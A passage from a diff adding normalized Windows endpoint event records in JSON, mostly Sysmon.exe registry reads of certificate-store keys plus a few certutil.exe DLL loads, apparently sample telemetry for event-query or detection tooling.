"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Wldap32.dll", + "image_path": "C:\\Windows\\System32\\Wldap32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cabinet.dll", + "image_path": "C:\\Windows\\System32\\cabinet.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "normaliz.dll", + "image_path": "C:\\Windows\\System32\\normaliz.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 